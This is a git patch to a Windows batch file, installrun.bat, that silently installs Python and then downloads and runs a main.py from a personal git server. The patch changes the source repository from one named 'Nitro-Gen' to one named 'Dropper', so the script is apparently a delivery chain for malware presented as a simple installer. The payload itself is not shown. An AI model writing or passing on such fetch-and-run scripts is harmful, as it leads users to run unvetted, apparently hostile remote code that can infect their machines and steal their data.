From 72cedad92b0856eace0080d0534438585a4f2897 Mon Sep 17 00:00:00 2001 From: heckeralt Date: Mon, 23 Sep 2024 09:39:57 -0400 Subject: [PATCH] Update installrun.bat --- installrun.bat | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/installrun.bat b/installrun.bat index 2661c73..9c235f8 100644 --- a/installrun.bat +++ b/installrun.bat @@ -1,5 +1,5 @@ powershell /c irm -uri "http://www.python.org/ftp/python/3.12.6/python-3.12.6-amd64.exe" -outfile "amd.exe" -powershell /c irm -uri "http://git.kevinthe.horse/heckeralt/Nitro-Gen/raw/branch/main/main.py" -outfile "main.py" +powershell /c irm -uri "http://git.kevinthe.horse/heckeralt/Dropper/raw/branch/main/main.py" -outfile "main.py" amd.exe /quiet InstallAllUsers=1 PrependPath=1 AssociateFiles=1 python -m pip install requests python main.py